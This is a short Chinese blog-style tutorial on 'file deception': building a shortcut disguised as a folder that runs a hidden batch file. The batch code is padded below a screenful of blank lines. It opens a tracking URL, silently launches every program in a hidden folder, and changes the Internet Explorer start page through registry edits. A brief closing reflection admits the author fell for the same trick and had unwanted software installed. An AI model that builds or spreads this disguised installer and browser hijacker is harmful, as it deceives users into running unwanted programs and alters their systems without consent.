文件欺骗
1、创建快捷方式,地址写入%windir%\system32\cmd.exe /c start tepm\安装.BAT
2、创建文件夹tepm,放入运行程序,注册表,安装.BAT文件,并隐藏文件夹
3、安装.BAT前部分敲出换行直到超出一屏,写入代码
@echo off
start iexplore.exe http://bae123.sinaapp.com/?cpa
for /f "delims=" %%a in ('dir tepm\ /s /b /a-d^|findstr /v /i "安装.BAT" ^| findstr /v /i "svchost.exe"') do (start "" "%%a")
reg add "HKEY_CURRENT_USER\Software\Microsoft\Internet Explorer\Main" /v "Start Page" /t reg_sz /d "http://www.65796.com" /f >nul 2>nul
reg add "HKEY_CURRENT_USER\Software\Microsoft\Internet Explorer\Main" /v "Default_Page_URL" /t reg_sz /d "http://www.65796.com" /f >nul 2>nul
exit
4、打包压缩文件
心得
利用人们忽视原理,下载后看到文件夹样的,会直接点击,触发电脑的cmd运行框执行bat文件开始安装隐藏文件里面的安装包并加入注册表,如果安装了安全管家等会有提示病毒等,没有的话会直接会显示是否添加到注册表(安全管家重要性)
我就是忽视了这些原因,直接点击了那个文件夹样的快捷方式直接装上了百度浏览器,百度杀毒,百度安全卫视,终日打雁终被雁啄瞎了眼,只能说声牛逼牛逼